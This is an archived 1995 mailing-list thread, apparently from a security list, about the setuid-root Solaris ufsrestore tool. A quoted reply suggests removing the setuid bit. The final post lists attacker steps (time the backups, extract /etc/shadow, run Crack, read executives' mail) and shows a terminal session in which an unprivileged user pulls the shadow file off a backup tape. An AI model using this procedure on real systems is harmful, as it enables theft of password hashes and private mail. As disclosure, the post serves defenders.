Sean Vickery wrote: > > On 14 November 1995, Brett Lymn wrote: > > According to Jake Luck: > > > > > >yeah, but what about /usr/sbin/ufsrestore ? > > > > > >it is statically linked, utilizes syslog, and suid root. > > > > > > > If you are a BOFH then just kill the setuid bit on ufsrestore. It > > means that root has to do the restores but it does close an awful lot > > of holes (like someone dragging in a QIC and restoring their favourite > > version of /etc/passwd.... need I say more?). Or you could just > > remove the global rx though this may bugger up remote root users. > > Yes, /usr/sbin/ufsrestore is suid root on my Solaris 2 box. But it is more > careful than to allow an unprivileged user create or overwrite files just > anywhere. > BUT, it will let you read ANY file from the tape. Including root owned files such as /etc/shadow. * Know when UNIX admins runs backups. * Extract files with ufsrestore (/etc/shadow) * Run Crack. * Or you could be reading root's mail, CEO email ...etc,etc $ pwd /home/esilva/ED_SILVA $ date Mon Dec 11 19:33:13 PST 1995 $ /usr/ucb/whoami esilva $ mt -f /dev/rmt/0 status Exabyte EXB-8500 8mm tape drive: sense key(0x0)= No Additional Sense residual= 0 retries= 0 file no= 0 block no= 0 $ mt -f /dev/rmt/0 rewind $ pwd /home/esilva/ED_SILVA $ ufsrestore -i /dev/rmt/0cn ufsrestore > ufsrestore > ls .: .rhosts .sh_history devices/ etc/ ufsrestore > cd etc ufsrestore > add shadow ufsrestore > extract You have not read any volumes yet. Unless you know which volume your file(s) are on you should start with the last volume and work towards the first. Specify next volume #: 1 set owner/mode for '.'? [yn] y ufsrestore > quit $ pwd /home/esilva/ED_SILVA $ cd etc $ ls -la total 8 drwxrwxr-x 2 esilva other 512 Dec 11 19:54 . drwxr-xr-x 3 esilva other 512 Oct 11 21:48 .. -r-------- 1 esilva other 1144 Oct 9 09:21 shadow.1.la Now run crack... -- Thanks! -Ed _ /\o/\ / <_> \ /^^/ \^^\ /___\ +---------------------------------------------------------------------+ | Can you see them all around us? | +---------------------------------------------------------------------+ | esilva@netcom.com | +---------------------------------------------------------------------+